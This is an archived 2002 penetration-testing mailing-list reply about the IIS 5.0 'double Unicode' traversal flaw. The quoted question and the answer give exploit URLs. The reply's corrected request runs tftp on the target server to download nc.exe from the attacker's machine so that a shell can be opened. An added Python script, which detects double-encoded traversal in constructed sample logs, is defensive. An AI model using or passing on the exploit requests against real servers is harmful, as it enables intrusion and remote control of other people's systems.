RE: Can't get a shell

From: Coral J. Cook (cjcookat_private)
Date: Thu Jul 11 2002 - 11:54:12 PDT


    > -----Original Message-----
    > From: Gaziel, Avishay [mailto:agazielat_private]
    > Sent: Tuesday, July 09, 2002 9:33 AM
    > To: PEN-TESTat_private
    > Subject: Can't get a shell
    >
    >
    > Hi All,
    > Situation:
    > An IIS5.0 vulnerable to unicode ("double Unicode", i.e. ..%255c.. etc.)
    > IIS sitting behind a firewall.
    > Problem:
    > host/scripts/..%255c.........../winnt/system32/cmd.exe?/tftp+-i+my
    > server+get+nc.exe doesn't work
    
    Here is the correct format:
    
    host/scripts/..%255c.........../winnt/system32/tftp?+"-i"+myserver+GET+nc.exe
    
    Notice that cmd.exe is removed and that -i is quoted ("-i").
    That should fix your problem.
    
    R,
    Coral
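
Added example, not part of the original post: a defender-side log check for the "double Unicode" (`..%255c..`) request shape discussed in this thread. It percent-decodes each logged URI repeatedly and reports requests where a traversal sequence only appears after two or more decodes. It assumes the web log records the request URI as received; the log layout, sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

TRAVERSAL = re.compile(r"\.\.[\\/]")   # "../" or "..\" in decoded text
MAX_PASSES = 4                          # bound on repeated decoding

def traversal_depth(uri):
    """Return the deepest decoding pass at which a new traversal sequence
    appears (0 = visible as sent), or None if there is none."""
    text, seen, deepest = uri, 0, None
    for depth in range(MAX_PASSES + 1):
        count = len(TRAVERSAL.findall(text))
        if count > seen:                # this pass uncovered a new one
            seen, deepest = count, depth
        decoded = unquote(text, encoding="latin-1")
        if decoded == text:             # nothing left to decode
            break
        text = decoded
    return deepest

def scan(log_lines):
    """Yield (client_ip, uri, depth) for requests whose URI hides a
    traversal behind two or more layers of percent-encoding."""
    for line in log_lines:
        if line.startswith("#") or not line.strip():
            continue
        fields = line.split()
        client_ip, uri = fields[2], fields[4]
        depth = traversal_depth(uri)
        if depth is not None and depth >= 2:
            yield client_ip, uri, depth

# Constructed sample log in a simplified layout (not real traffic)
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri sc-status
2002-07-09 16:30:01 192.0.2.10 GET /default.asp 200
2002-07-09 16:30:05 192.0.2.10 GET /search.asp?q=100%2525 200
2002-07-09 16:31:12 198.51.100.7 GET /scripts/..%5c../winnt/system32/tftp.exe 404
2002-07-09 16:31:15 198.51.100.7 GET /scripts/..%255c../winnt/system32/tftp.exe 200
""".splitlines()

if __name__ == "__main__":
    for ip, uri, depth in scan(SAMPLE_LOG):
        print(f"{ip} traversal visible after {depth} decodes: {uri}")
```

The benign `q=100%2525` line is also double-encoded but is not reported, because decoding it never produces a traversal sequence.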
    
    
    